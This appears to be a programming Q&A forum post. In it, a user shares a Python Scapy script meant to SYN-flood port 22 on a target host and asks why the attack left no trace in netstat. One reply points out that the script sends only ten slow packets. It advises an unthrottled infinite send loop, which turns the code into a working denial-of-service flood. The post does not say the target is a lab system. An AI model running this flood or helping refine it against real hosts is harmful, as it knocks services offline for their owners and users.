# I created this SYN Flood attack code but when I do netstat -at in the destination host looks like the attack didn't performed

Tags: python, scapy, network-security

I'm creating a SYN Flood Attack but the attack looks never happened when I try to do `netstat -at` in destination host.

```
#!/usr/bin/python
from scapy.all import *

p=IP(dst="192.192.192.192",id=1111,ttl=99)/TCP(sport=RandShort(),dport=22,seq=12345,ack=1000,window=1000,flags="S")
ans,unans=srloop(p,inter=0.3,retry=2,timeout=4, count=10)
ans.summary()
unans.summary()
```

I'm trying to do SYN Flood attack and when I do `netstat -at` in destination host find the attack result there. I didn't find the attack at all.

Comment: Have you tried to capture packets?

Comment: Flooding is sending a large amount of packets at a very high rate. Here you only send 10 packets with an inter packet silence of 0.3 seconds.  This is not flooding at all.  You should instead send packets in an infinite loop without waiting at all, i.e., do something like: `while True: send(p)`